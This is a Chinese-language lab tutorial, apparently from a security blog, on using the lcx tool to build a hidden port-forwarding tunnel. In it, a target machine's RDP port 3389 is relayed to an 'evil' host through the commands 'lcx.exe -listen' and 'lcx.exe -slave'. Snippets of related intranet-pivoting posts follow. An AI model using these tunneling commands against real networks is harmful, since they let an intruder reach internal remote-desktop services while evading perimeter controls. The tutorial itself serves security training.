郑重声明:
本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。

隐藏隧道通信:lcx 端口转发

  • 1 lcx 端口转发原理
  • 2 实验环境
  • 3 配置服务端
  • 4 配置客户端

1 lcx 端口转发原理

lcx 是基于 Socket 套接字实现的端口转发工具,Windows 版本名称为 LCX、Linux 版本为 portmap。

一个基本的 Socket 隧道必须包含两端:

  1. 服务端:监听一个端口,等待客户端连接
  2. 客户端:通过传入服务端的 IP 地址和端口,与服务端建立连接。
lcx.exe -h
[Usage of Packet Transmit:]lcx.exe -<listen|tran|slave> <option> [-log logfile][option:]-listen <ConnectPort> <TransmitPort>-tran   <ConnectPort> <TransmitHost> <TransmitPort> # 经测试无法过 nat 有点鸡肋。-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>

2 实验环境

3 配置服务端

  • 在 evil 主机上,将本机 4444 端口上监听的所有数据转发到本地的 13389 端口上
lcx.exe -listen 4444 13389

4 配置客户端

  • 首先准备好一个具有公网 ip 的服务器,假定域名或者公网 ip 是 192.168.0.21
  • 在目标机器上将 3389 端口的所有数据转发到恶意主机的 4444 端口上。

  1. 配置 LCX 端口转发

    .\lcx.exe -slave 192.168.0.110 4444 127.0.0.1 3389

  2. 客户端与服务端建立通信连接

  3. 与远程主机建立远程桌面连接

    • 客户端:

    • 服务端:

  4. 抓包查看流量特征

隐藏隧道通信:lcx 端口转发相关推荐

  1. 隐藏隧道通信:HTTP/HTTPS 代理转发

    郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. 隐藏 ...

  2. lcx端口转发工具的使用

    Linux版lcx端口转发工具使用 0x01 前言 在实际情况中,web应用服务通常会被运行在内网机器上,然后通过端口映射到外网,供外网用户进行访问.如果我们已经攻破网站,拿到内网机器权限,通常会安装 ...

  3. 建立SSH隧道(SSH端口转发)

    ssh隧道功能,也就是端口转发功能非常好用,可以实现一些代理功能或者是穿透内网功能. ssh的端口转发(或者叫做隧道)命令分为三种: 本地:ssh -C -f -N -g -L listen_port ...

  4. 内网渗透-端口转发隧道技术

    文章目录 代理和隧道技术区别 隧道通信原理 常用的隧道技术 判断内网协议连通性 ICMP协议 TCP协议 telnet NC HTTP协议 curl Wget DNS协议 nslookup dig I ...

  5. 内网安全-流量隧道(一)不出网CS上线正反向端口转发

    隧道技术概述: 在数据通信被拦截的情况下利用隧道技术封装改变通信协议进行绕过拦截 CS.MSF无法上线,数据传输不稳定无回显,出口数据被监控,网络通信存在问题等 在实际的网络中,通常会通过各种边界设备 ...

  6. SSH 端口转发多级端口转发

    简介 SSH 除了登录服务器,还有一大用途,就是作为加密通信的中介,充当两台服务器之间的通信加密跳板,使得原本不加密的通信变成加密通信.这个功能称为端口转发(port forwarding),又称 S ...

  7. linux远程ipv6端口,SSH端口转发笔记(ipv6 与 端口映射)

    端口转发概念 端口转发或隧道,是一种通过SSH转发本来不安全的TCP通信的安全保护罩.您可以保护例如POP3,SMTP和HTTP连接,否则可能是不安全的.网络上什么人都有! 有两种类型的端口转发:本地 ...

  8. 一文彻底搞懂ssh的端口转发

    文章目录 背景 什么是端口转发? 本地端口转发 本地端口转发的语法 场景1 场景二 ssh -L参数解释 ssh 远程端口的安全问题 远程端口转发 远程端口转发的语法 场景一 远程端口转发和本地端口转 ...

  9. 红蓝对抗之隧道技术第一篇(内网穿透、端口映射端口转发、Netsh端口转发、CS正反向连接多层内网、Burp设置上游代理访问内网、MSF protfwd端口转发/重定向)

    文章目录 隧道应用 端口映射&端口转发 Netsh端口转发 Netsh端口转发meterpreter CS正向连接多层内网 CS反向连接多层内网 Burp设置上游代理访问内网 MSF prot ...

  10. SSH隧道技术----端口转发,socket代理

    原文的原始出处不详,本文也是在复制引用了某篇转载,并做了必要的整理与编辑. 本文的受众 如果你遇到了以下问题,那么你应该阅读这篇文章 我听说过这种技术,我对它很感兴趣 我想在家里访问我在公司的机器(写 ...

最新文章

  1. tomcat中的目录映射
  2. 导入jQuery库时应该注意的问题
  3. 0X8009310B (ASN:276) win7安装证书时出现错误消息:找不到与此证书文件相关联的证书申请微软官方文档
  4. Android图像变化
  5. 最新 Docker 部署nginx Tocmat跑项目(解决springBoot启动两次的问题)
  6. 查询varchar实际大小_微服务和VUE(11): mybatis 动态查询
  7. android tcp ip modem ppp gprs,为什么GPRS调制解调器提供嵌入式TCP/IP协议栈
  8. oracle自定义函数返回一个表,oracle 自定义函数 返回一个表类型
  9. 和could的区别用法_高考英语语法情态动词用法指南
  10. 聚类分析原理(动图演示)
  11. JS中var、let以及const关键字到底怎么用?
  12. JAVA--多线程管理
  13. pycharm远程操作linux进行开发
  14. 读取MoleBox打包的可执行文件中的数据文件一法
  15. 懒惰、急躁和傲慢(Laziness, Impatience and hubris)
  16. 【linuxandroid源码阅读】
  17. CSDN-markdown编辑器帮助文档
  18. C++ 寻找完数 | Java 完数
  19. 数据通信,数据通信原理是什么?
  20. 蒟蒻的爬虫之旅(Python版)——robots君子协议(转载)

热门文章

  1. 网络虚拟化之虚拟交换机技术Linux Bridge
  2. Linux核心进程管理命令
  3. 联想笔记本摄像头故障处理方法
  4. 百度离线地图瓦片下载器
  5. PostGreSQL8.0.0中文手册
  6. nginx 日志格式打印
  7. 马云在《赢在中国》对创业者的经典点评~
  8. 计算机工程与应用论文模板,计算机工程与应用论文模板
  9. 垃圾邮件服务器 查询,exchange2013如果在服务器上查询到垃圾邮件的真实IP地址
  10. Python制作登陆界面(1)(超简单)